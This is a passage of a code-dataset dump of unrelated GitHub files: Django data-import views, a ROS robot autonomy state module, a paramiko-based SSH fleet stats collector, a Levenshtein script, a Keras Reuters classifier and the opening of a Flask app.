str(docs.file)\n\ti = 0 # itterateur pour le nombre de ligne dans le fichier\n\tdonnees = [] # permet de stocker les valeurs du fichier dans un tableau de tableau\n\tdonnees_brutes = [] # permet de stocker les valeurs du fichier dans un tableau ce sont des lignes\n\tligne_erreurs = []\n\tfileName, fileExtension = os.path.splitext(basename(file_name))\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\t#IMPORTATION FICHIER TXT\n\n\t\t\tif docs.importer == 0 and fileExtension == '.txt':\n\t\t\t\tfichier = open(file_name,'r', encoding='cp1252')\n\t\t\t\thead = fichier.readline()\n\n\n\t\t\t#IMPORTATION FICHIER ADDRESSE ELEVES\n\t\t\t\tif file_name.lower().find(\"adr\") >= 0:\n\t\t\t\t\tprint(\"okkkjlkjk\")\n\t\t\t\t\tprint(\"okkkk\")\n\t\t\t\t\tfor line in fichier:\n\t\t\t\t\t\tdonnees.append(line.split(\"\\t\"))\n\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\ttry : \n\t\t\t\t\t\t\tprint(line)\n\t\t\t\t\t\t\tEleve(adresse=\"NULL\",\n\t\t\t\t\t\t\t\tid=donnees[i][3].replace(\"\\n\",\"\"),\n\t\t\t\t\t\t\t\tcodepostal=donnees[i][0],\n\t\t\t\t\t\t\t\tville = donnees[i][1],\n\t\t\t\t\t\t\t\tpays=donnees[i][2]).save()\n\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" +line)\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\t\t\t\t\treturn render(request, 'importationfichier/uploadbdd.html', { 'documents': docs ,'ligne_erreurs' :ligne_erreurs, 'donnees' : donnees_brutes})\n\n\t\t\t#IMPORTATION FICHIER STAGES\n\n\t\t\t\tif file_name.lower().find(\"stage\") >= 0:\n\t\t\t\t\tprint(\"okkkk\")\n\n\t\t\t\t\tfor line in fichier:\n\t\t\t\t\t\tdonnees.append(line.split(\"\\t\"))\n\t\t\t\t\t\tprint(\"caca\",len(donnees[i][8].replace(\"\\n\",\"\")))\n\t\t\t\t\t\tprint(\"caca2\",(donnees[i][8].replace(\"\\n\",\"\")))\n\t\t\t\t\t\tprint(\"en cours\",i)\n\t\t\t\t\t\ttry : \n\t\t\t\t\t\t\ttmp = Eleve.objects.get(pk=donnees[i][8].replace(\"\\n\",\"\"))\n\t\t\t\t\t\t\tStage(\n\t\t\t\t\t\t\t\tannee=donnees[i][0],\n\t\t\t\t\t\t\t\tanneescolaire=donnees[i][1],\n\t\t\t\t\t\t\t\tentreprise=donnees[i][2],\n\t\t\t\t\t\t\t\tcodepostal=donnees[i][3],\n\t\t\t\t\t\t\t\tville = donnees[i][4],\n\t\t\t\t\t\t\t\tpays=donnees[i][5],\n\t\t\t\t\t\t\t\tsujet=donnees[i][6],\n\t\t\t\t\t\t\t\tsalaire=donnees[i][7],\n\t\t\t\t\t\t\t\tideleve =tmp).save()\n\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" +line)\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\n\t\t\t#IMPORTATION FICHIER PROGRAMMES\n\n\t\t\t\tif file_name.lower().find(\"prg\") >= 0:\n\t\t\t\t\tprint(\"okkkk\")\n\t\t\t\t\tfor line in fichier:\n\t\t\t\t\t\tdonnees.append(line.split(\"\\t\"))\n\t\t\t\t\t\tprint(\"en cours\",i)\n\t\t\t\t\t\ttry : \n\t\t\t\t\t\t\ttmp = Eleve.objects.get(pk=donnees[i][0].replace(\"\\n\",\"\"))\n\t\t\t\t\t\t\tSpecialitecampus(\n\t\t\t\t\t\t\t\tideleve=tmp,\n\t\t\t\t\t\t\t\tprogramme=donnees[i][1],\n\t\t\t\t\t\t\t\tcampus=donnees[i][3],\n\t\t\t\t\t\t\t\tanneescolaire=donnees[i][2]).save()\n\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\tdonnees_brutes.append(line)\n\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" +line)\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\n\t\t\t#IMPORTATION FICHIER CSV\n\n\t\t\tif docs.importer == 0 and fileExtension == '.csv':\n\t\t\t\tif file_name.lower().find(\"adr\") >= 0:\n\t\t\t\t\tfichier = open(file_name,'rt', encoding='cp1252')\n\t\t\t\t\treader = csv.reader(fichier)\n\t\t\t\t\tfor ligne in reader:\n\t\t\t\t\t\tdel ligne[4] #supprime le dernier element de la liste\n\t\t\t\t\t\tif i != 0:\n\t\t\t\t\t\t\ttry :\n\t\t\t\t\t\t\t\tEleve(adresse=\"NULL\",\n\t\t\t\t\t\t\t\t\tid=ligne[3],\n\t\t\t\t\t\t\t\t\tcodepostal=ligne[0],\n\t\t\t\t\t\t\t\t\tville = ligne[1],\n\t\t\t\t\t\t\t\t\tpays=ligne[2]).save()\n\t\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\t\tdonnees_brutes.append(ligne)\n\t\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" + \" \".join(ligne))\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\n\t\t\t\tif file_name.lower().find(\"prg\") >= 0:\n\t\t\t\t\tfichier = open(file_name,'rt', encoding='cp1252')\n\t\t\t\t\treader = csv.reader(fichier)\n\t\t\t\t\tfor ligne in reader:\n\t\t\t\t\t\tprint(\"nem : \",i)\n\t\t\t\t\t\t #supprime le dernier element de la liste\n\t\t\t\t\t\tif i != 0:\n\t\t\t\t\t\t\tprint(ligne)\n\t\t\t\t\t\t\ttry :\n\t\t\t\t\t\t\t\ttmp = Eleve.objects.get(pk=ligne[0])\n\t\t\t\t\t\t\t\tSpecialitecampus(\n\t\t\t\t\t\t\t\t\tideleve=tmp,\n\t\t\t\t\t\t\t\t\tprogramme=ligne[1],\n\t\t\t\t\t\t\t\t\tcampus=ligne[3],\n\t\t\t\t\t\t\t\t\tanneescolaire=ligne[2]).save()\n\t\t\t\t\t\t\texcept :\n\t\t\t\t\t\t\t\tdonnees_brutes.append(ligne)\n\t\t\t\t\t\t\t\trequest.session['nbr_ligne_erreur_bdd'] = True\n\t\t\t\t\t\t\t\tligne_erreurs.append(\"Ligne \" + str(i+1) + \" : \" + \" \".join(ligne))\n\t\t\t\t\t\ti = i + 1\n\t\t\t\t\tprint(\"Nombre de lignes dans le 
fichier\",i)\n\t\t\t\t\tdocs.importer = True\n\t\t\t\t\trequest.session['importation_bdd'] = True\n\t\t\t\t\tdocs.save()\n\t\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\n\treturn render(request,'importationfichier/uploadbdd.html', { 'documents': docs ,'ligne_erreurs' :ligne_erreurs, 'donnees' : donnees_brutes})\n\ndef delete_file(request,id_file):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tdocs = Document.objects.get(pk=id_file)\n\t\t\t\tos.remove(docs.file.path)\n\t\t\t\tdocs.delete()\n\t\t\t\trequest.session['delete_file'] = True\n\t\t\texcept:\n\t\t\t\tdocs = None\n\t\t\t\trequest.session['delete_file'] = False\n\t\t\treturn render(request, 'importationfichier/delete_file.html',{'docs' : docs})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\ndef delete_base_eleve(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tEleve.objects.all().delete()\n\t\t\t\trequest.session['delete_base'] = True\n\t\t\texcept:\n\t\t\t\trequest.session['delete_base'] = False\n\t\t\treturn render(request, 'importationfichier/delete_base.html',{'nom' : \"élèves\"})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\ndef delete_base_stage(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tStage.objects.all().delete()\n\t\t\t\trequest.session['delete_base'] = True\n\t\t\texcept:\n\t\t\t\trequest.session['delete_base'] = False\n\t\t\treturn render(request, 'importationfichier/delete_base.html',{'nom' : \"stage\"})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\ndef delete_base_programme(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\ttry :\n\t\t\t\tSpecialitecampus.objects.all().delete()\n\t\t\t\trequest.session['delete_base'] = True\n\t\t\texcept:\n\t\t\t\trequest.session['delete_base'] = False\n\t\t\treturn render(request, 'importationfichier/delete_base.html',{'nom' : \"programmes\"})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\t\n","repo_name":"florinouzerr/statseisti","sub_path":"importationfichier/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10564,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"193154279","text":"from datetime import datetime\nimport json\nimport rospy\nfrom std_msgs.msg import Float32, Float64, Bool, String, Float32MultiArray\nfrom geometry_msgs.msg import Pose, PoseWithCovarianceStamped\nfrom diff_drive.msg import Goal, GoalPath, Constants, Linear, Angular\nfrom .path import AutoGoal, AutoPath, Autons\nimport time\nimport rospkg \nimport 
math\n\nglobal data\ndata = []\n\ndef read_json():\n \"\"\" This reads the auton data and saves it to a list to be used \"\"\"\n try:\n rospack = rospkg.RosPack()\n file_path = rospack.get_path('autonomous') + \"/src/auton_scripts/auton_modules/path-editor/data.txt\"\n with open(file_path) as json_file:\n json_data = json.load(json_file)\n\n new_data = []\n for d in json_data:\n a = Autons(len(new_data))\n a.deserialize_json(d)\n new_data.append(a)\n\n global data\n data = new_data\n except:\n read_json()\n \nread_json()\n\nclass State(object):\n \"\"\"\n We define a state object which provides some utility functions for the\n individual states within the state machine.\n \"\"\"\n\n def __init__(self, ros_node):\n self.ros_node = ros_node\n self.initialize()\n self.action_executed = False\n\n self.start_time = time.time()\n\n def log_state(self):\n \"\"\" Logs the name of the State \"\"\"\n rospy.loginfo(\"STATE: %s [%s]\" %(self.__class__.__name__, 15 - self.ros_node.get_time()))\n \n # Counts the amount of time \n def start_timer(self):\n \"\"\" Used to start a timer that counts time within a state \"\"\"\n self.start_time = time.time()\n\n def check_timer(self, wanted_time):\n \"\"\" Checks if the amount of time given has passed \"\"\"\n if time.time() - self.start_time >= wanted_time:\n return True\n return False\n\n # Function for working with wrapping angles\n def wrap_angle(self, angle):\n if angle < 0.0:\n return (math.pi * 2) + angle\n elif angle >= (math.pi * 2):\n return angle - (math.pi * 2)\n\n return angle\n \n # Get data\n def get_path(self):\n return self.ros_node.get_data(\"/pathTable/status/path\")\n\n def get_point(self):\n return self.ros_node.get_data(\"/pathTable/status/point\")\n \n def get_ball_count(self):\n return self.ros_node.get_data(\"/auto/numBall\")\n\n def finished_path(self, path_num):\n string_array = self.ros_node.get_data(\"/pathTable/status/finishedPath\").split()\n\n if (string_array[0] == \"true\" and int(string_array[1]) >= path_num):\n return True\n else:\n return False\n\n # This runs in the child class when created\n def initialize(self):\n pass\n\n # This runs once in the child class\n def execute_action(self):\n pass\n\n # This runs in a loop in the child class\n def tick(self):\n pass\n\n # This makes it so that the functions created in the child class act as they should\n def update(self):\n if not self.action_executed:\n self.execute_action()\n self.action_executed = True\n return self.tick()\n\nclass SetIdle(State):\n\n def setRobotPose(self):\n global data\n msg = Float32MultiArray()\n for auton in data:\n if auton.title == self.ros_node.auton_title:\n msg.data = auton.start_pose\n self.ros_node.publish('/robot_set_pose', Float32MultiArray, msg, latching = True)\n rospy.loginfo(\"Reset Robot Pose\")\n\n def setIdle(self):\n # Retract intake\n intake_state = String()\n intake_state.data = \"retract\"\n self.ros_node.publish(\"/auto/intake/state\", String, intake_state, latching = True)\n rospy.loginfo(\"Retracted Intake\")\n\n # Shooter idle\n shooter_state = String()\n shooter_state.data = \"idle\"\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Idle\")\n\n # Flywheel idle\n flywheel_state = String()\n flywheel_state.data = \"idle\"\n self.ros_node.publish(\"/auto/flywheel/state\", String, flywheel_state, latching = True)\n rospy.loginfo(\"Flywheel Idle\")\n\n # Hood idle\n hood_state = String()\n hood_state.data = \"idle\"\n self.ros_node.publish(\"/auto/hood/state\", 
String, hood_state, latching = True)\n rospy.loginfo(\"Hood Idle\")\n\n # Path Idle\n self.ros_node.publish(\"/pathTable/startPathIndex\", Float32, -1, latching = True)\n\n\n\nclass StartPath(State):\n\n # Actions\n def start_path(self, index):\n \"\"\" This gets the path data from the json file and publishes to diff_drive \"\"\"\n # Checks for updated data\n self.ros_node.publish(\"/pathTable/startPathIndex\", Float32, index, latching = True)\n \n\n# This is ROBOT SPECIFIC\nclass Intake(State):\n\n # Actions\n def deploy_intake(self):\n \"\"\" This publishes a msg to deploy the intake \"\"\"\n intake_state = String()\n intake_state.data = \"deploy\"\n\n self.ros_node.publish(\"/auto/intake/state\", String, intake_state, latching = True)\n rospy.loginfo(\"Deployed Intake\")\n\n def retract_intake(self):\n \"\"\" This publishes a msg to retract the intake \"\"\"\n intake_state = String()\n intake_state.data = \"retract\"\n\n self.ros_node.publish(\"/auto/intake/state\", String, intake_state, latching = True)\n rospy.loginfo(\"Retracted Intake\")\n\nclass Color(State):\n\n # Actions\n def enable_color(self):\n \"\"\" This publishes a msg to deploy the intake \"\"\"\n color_state = String()\n color_state.data = \"enable\"\n\n self.ros_node.publish(\"/auto/color/state\", String, color_state, latching = True)\n rospy.loginfo(\"Enabled Color Sensor\")\n\n def disable_color(self):\n \"\"\" This publishes a msg to retract the intake \"\"\"\n color_state = String()\n color_state.data = \"disable\"\n\n self.ros_node.publish(\"/auto/color/state\", String, color_state, latching = True)\n rospy.loginfo(\"Disabled Color Sensor\")\n\nclass Shooter(State):\n\n # This puts the shooter in idle mode and allows other sub systems to do specific functions\n def idle(self):\n \"\"\" This puts the shooter in idle mode \"\"\"\n shooter_state = String()\n shooter_state.data = \"idle\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Idle\")\n \n # Overrides the other states because it needs to control all three subsystems \n def hide_shoot(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"hide_shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Hide Shoot\")\n \n def hide_poop(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"hide_poop\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Hide Poop\")\n\n def lob_prime(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"lob_prime\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Lob Prime\")\n\n def lob_shoot(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"lob_shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Lob Shoot\")\n\n def start_prime(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"prime\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n 
rospy.loginfo(\"Shooter Prime\")\n\n def start_shoot(self):\n \"\"\" This makes the turret begin to shoot \"\"\"\n shooter_state = String()\n shooter_state.data = \"shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Shooting\")\n\nclass Flywheel(Shooter):\n\n # Conditions\n def reached_rpm(self, rpm):\n \"\"\" Checks if the fly wheel has reached the wanted rpm \"\"\"\n if self.ros_node.get_data(\"/auto/flywheel/current/rpm\") == rpm:\n return True\n return False\n\n # Actions (Only works if Shooter is in idle)\n def idle_flywheel(self):\n \"\"\" This puts the shooter into idle mode \"\"\"\n flywheel_state = String()\n flywheel_state.data = \"idle\"\n\n self.ros_node.publish(\"/auto/flywheel/state\", String, flywheel_state, latching = True)\n rospy.loginfo(\"Flywheel Idle\")\n\n def start_spin_up(self, rpm):\n \"\"\" This starts the robot's spin up to a specific rpm \"\"\"\n flywheel_state = String()\n flywheel_state.data = \"spin_up\"\n\n flywheel_rpm = Float32()\n flywheel_rpm.data = rpm\n\n self.ros_node.publish(\"/auto/flywheel/state\", String, flywheel_state, latching = True)\n self.ros_node.publish(\"/auto/flywheel/wanted/rpm\", Float32, flywheel_rpm, latching = True)\n rospy.loginfo(\"Flywheel Spinup\")\n\nclass Hood(Shooter):\n\n # Actions (Only works if Shooter is in idle)\n def idle_hood(self):\n \"\"\" This puts the hood into idle mode \"\"\"\n hood_state = String()\n hood_state.data = \"idle\"\n\n self.ros_node.publish(\"/auto/hood/state\", String, hood_state, latching = True)\n rospy.loginfo(\"Hood Idle\")\n\n def actuate_hood(self, angle):\n \"\"\" This adjusts the hood to the given angle \"\"\"\n hood_state = String()\n hood_state.data = \"actuate\"\n\n self.ros_node.publish(\"/auto/hood/state\", String, hood_state, latching = True)\n rospy.loginfo(\"Hood Actuate\")\n","repo_name":"Team624/robot2022-ros","sub_path":"src/autonomous/src/auton_scripts/auton_modules/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"29212831167","text":"import os\nimport sys\n\nimport paramiko\nimport argparse\nimport logging\nimport time\n\nfrom random import randint\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import serialization\n\nfrom lib import storage\nfrom lib import config\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s %(message)s')\nglobal_logger = logging.getLogger(__name__)\n\n\ndef store_stats(ip_addr, stats, username, password):\n #stats has the format: os, cpu_usage, mem_usage, uptime, event_logs\n db = storage.Storage(username, password)\n db_row_id = db.store_machine_stats(ip_addr, stats.split(','))\n global_logger.info('Stats recorded: %s', db_row_id)\n\n\ndef get_crypto_keys():\n private_key = rsa.generate_private_key(public_exponent=65537,\n key_size=2048,\n backend=default_backend())\n public_key = private_key.public_key()\n return private_key, public_key\n\ndef get_public_pem_data(public_key):\n return public_key.public_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo)\n\n\ndef get_decrypted_output(encrypted_file, private_key):\n file = open(encrypted_file, 'rb')\n 
ciphertext = file.read()\n plaintext = ''\n try:\n plaintext = private_key.decrypt(ciphertext, padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(), label=None))\n except ValueError as e:\n global_logger.error('Major issue happened with decryption: %s', e)\n\n return plaintext\n\ndef write_to_file(filename, content, mode):\n try:\n pk_file = open(filename, mode)\n pk_file.write(content)\n pk_file.close()\n return True\n except:\n global_logger.error('Error while writin to file')\n return False\n\n# TODO(mohamedzouaghi): Refactor the ssh_connect function to make it shorter\ndef ssh_connect(machine, max_retry=config.DEFAULT_RETRY):\n # machine is of a type Client namedtuple\n ssh_client = paramiko.SSHClient()\n ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n retry = 0\n while retry <= max_retry:\n try:\n ssh_client.connect(machine.ip, int(machine.port), username=machine.username,\n password=machine.password, timeout=4)\n break\n except (paramiko.ssh_exception.NoValidConnectionsError, OSError) as e:\n global_logger.warn('Issue wih ssh connection: %s.', e)\n if retry + 1 <= max_retry:\n sleep_duration = 30 + 30 * retry\n global_logger.warn('Sleeping for %d seconds before retrying.', sleep_duration)\n time.sleep(sleep_duration)\n retry += 1\n\n if retry > max_retry:\n fatal_error_msg = 'Fatal error with connection. Exiting.'\n global_logger.fatal(fatal_error_msg)\n sys.exit('Fatal error with connection. Exiting.')\n\n source_file_path = os.path.join('..', 'client_script')\n client_script = 'local_collector.py'\n # below is for linux only\n target_file_path = '/tmp/'\n # below to be removed only useful for debug\n target_client_script = client_script[:-3] + str(randint(0, 10000)) + client_script[-3:]\n local_copy_stats_results_filepath = 'encrypted_stats'\n\n\n private_key, public_key = get_crypto_keys()\n # pem_data is the serialization of the pubic_key to bytes so client machine can re-generate\n # the public key\n public_pem_data = get_public_pem_data(public_key)\n source_pk_filepath = 'public_keys' \n pk_filename = 'pk_' + machine.ip + str(randint(0, 100000)) + '.pk'\n\n\n if not write_to_file(os.path.join(source_pk_filepath, pk_filename), public_pem_data, 'wb'):\n global_logger.fatal('Fatal error with public key storing. 
Exiting.')\n\n    \n    sftp = ssh_client.open_sftp()\n    copy_pk_results = sftp.put(os.path.join(source_pk_filepath, pk_filename), os.path.join(target_file_path, pk_filename))\n    global_logger.info('copy_pk_results: %s', copy_pk_results)\n\n    sftp = ssh_client.open_sftp()\n    sftp_results = sftp.put(os.path.join(source_file_path, client_script), os.path.join(target_file_path, target_client_script))\n    global_logger.info('sftp_results: %s', sftp_results)\n\n    # TODO(mohamedzouaghi): Need to change this so it supports Windows and MacOS\n    command = 'python3 ' + target_file_path + target_client_script + ' -f ' + target_file_path + pk_filename\n    stdin, stdout, stderr = ssh_client.exec_command(command)\n    encrypted_remote_filename = stdout.read().decode('utf-8').rstrip()\n\n    encrypted_local_name = os.path.join(local_copy_stats_results_filepath, encrypted_remote_filename.split('/')[-1].rstrip())\n\n    global_logger.info('received stdout:\\n%s\\nReceived stderr:\\n%s' % (encrypted_remote_filename, stderr.read()))\n    copy_stats_results = sftp.get(encrypted_remote_filename, encrypted_local_name)\n    decrypted_output = get_decrypted_output(encrypted_local_name, private_key)\n    global_logger.info('received_output_after_decryption: %s', decrypted_output.decode('utf-8'))\n    return decrypted_output.decode('utf-8')\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-u', '--username', required=False, default=config.DEFAULT_USERNAME,\n                        help='username used for DB operations.')\n    parser.add_argument('-p', '--password', required=False, default=config.DEFAULT_PASSWORD,\n                        help='password used for DB operations.')\n    parser.add_argument('-r', '--retry', required=False, default=config.DEFAULT_RETRY, type=int,\n                        help='Number of ssh connection attempts in case the first attempt fails. 
Eg: If 1, there will be one more attempt etc...')\n\n    args = parser.parse_args()\n\n    remote_machines = config.get_clients_details(include_alerts=False)\n    for m in remote_machines:\n        machine_stat = ssh_connect(m, max_retry=args.retry)\n        store_stats(m.ip, (machine_stat), args.username, args.password)\n\n\n\nif __name__ == '__main__':\n    main()","repo_name":"mohamedzouaghi/fleet_health","sub_path":"server_script/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32368459409","text":"import numpy as np\n\n\ndef print_distances(distances, token1Length, token2Length):\n    for t1 in range(token1Length + 1):\n        for t2 in range(token2Length + 1):\n            print(int(distances[t1][t2]), end=\" \")\n        print()\n\n\ndef lev_dist_words(tokenA, tokenB):\n    distances = np.zeros((len(tokenA) + 1, len(tokenB) + 1))\n\n    for tA in range(1, len(tokenA) + 1):\n        for tB in range(1, len(tokenB) + 1):\n            charA = tokenA[tA - 1]\n            charB = tokenB[tB - 1]\n            if charA == charB:\n                distances[tA][tB] = distances[tA - 1][tB - 1]\n            else:\n                before = distances[tA][tB - 1]\n                upper = distances[tA - 1][tB]\n                diagonal = distances[tA - 1][tB - 1]\n\n                if (before <= upper and before <= diagonal):\n                    distances[tA][tB] = before + 1\n                elif (upper <= before and upper <= diagonal):\n                    distances[tA][tB] = upper + 1\n                else:\n                    distances[tA][tB] = diagonal + 1\n\n    print_distances(distances, len(tokenA), len(tokenB))\n    return distances[len(tokenA)][len(tokenB)]\n\n\ndist = lev_dist_words(\"студент\", \"николай\")\nprint(dist)\n","repo_name":"NikolayKolibarov/CSCB817-Natural-Language-Processing","sub_path":"min-edit-distance/levenshtein.py","file_name":"levenshtein.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2793746796","text":"#Classifying newswires: a multi-class classification example\n\nfrom keras.datasets import reuters\nimport numpy as np\nfrom keras import models\nfrom keras import layers\nimport matplotlib.pyplot as plt\n\ndef vectorize_sequences(sequences, dimension=10000):\n    results = np.zeros((len(sequences), dimension))\n    for i, sequence in enumerate(sequences):\n        results[i, sequence] = 1.\n    return results\n\ndef to_one_hot(labels, dimension=46):\n    results = np.zeros((len(labels), dimension))\n    for i, label in enumerate(labels):\n        results[i, label] = 1.\n    return results\n\n(train_data, train_labels), (test_data, test_labels) = reuters.load_data(num_words=10000)\n\n#ENCODING DATA\n# Our vectorized training data\nx_train = vectorize_sequences(train_data)\n# Our vectorized test data\nx_test = vectorize_sequences(test_data)\n\n#ENCODING LABELS\n# Our vectorized training labels\none_hot_train_labels = to_one_hot(train_labels)\n# Our vectorized test labels\none_hot_test_labels = to_one_hot(test_labels)\n\n#MODEL DEFINITION\nmodel = models.Sequential()\nmodel.add(layers.Dense(64, activation='relu', input_shape=(10000,)))\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(46, activation='softmax'))\n\nmodel.compile(optimizer='rmsprop',loss='categorical_crossentropy',metrics=['accuracy'])\n\n#TRAINING THE MODEL\nx_val = x_train[:1000]\npartial_x_train = x_train[1000:]\ny_val = one_hot_train_labels[:1000]\npartial_y_train = one_hot_train_labels[1000:]\n\nhistory = model.fit(partial_x_train,partial_y_train,epochs=20,batch_size=512,validation_data=(x_val, y_val))\n\n#PLOTTING TRAINING AND 
VALIDATION LOSS\nplt.figure(1)\nplt.subplot(211)\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(loss) + 1)\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.subplot(212)\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\nplt.show()\n\n#EVALUATE THE MODEL\nresults = model.evaluate(x_test, one_hot_test_labels)\nprint(results)\nprint(\"Done!!!!!!!!!!!!!!!!!\")","repo_name":"davidruizhidalgo/unsupervisedRemoteSensing","sub_path":"0_MATLAB/0_Initial Codes/codeBaseExamples Python/deepNetworksExamples/multiclassExample.py","file_name":"multiclassExample.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"6"} +{"seq_id":"15249003622","text":"# -*- encoding=utf-8 -*-\n# Authentication is inspired from the tutorial by Microsoft form azure active\n# directory authentication.\n# Tutorial Source: https://github.com/rebremer/ms-identity-python-webapp-backend\nimport msal\nimport uuid\nimport config\nimport functools\nfrom camera import Camera\nfrom flask_session import Session\nfrom bson.objectid import ObjectId\nimport flask_monitoringdashboard as dashboard\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom flask 